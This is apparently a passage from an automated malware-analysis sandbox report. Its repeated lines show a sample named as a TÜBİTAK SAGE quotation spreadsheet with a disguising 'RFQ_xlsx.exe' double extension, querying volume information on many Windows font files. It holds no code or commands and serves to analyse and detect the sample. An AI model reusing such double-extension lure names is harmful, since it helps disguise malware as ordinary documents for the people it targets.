                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
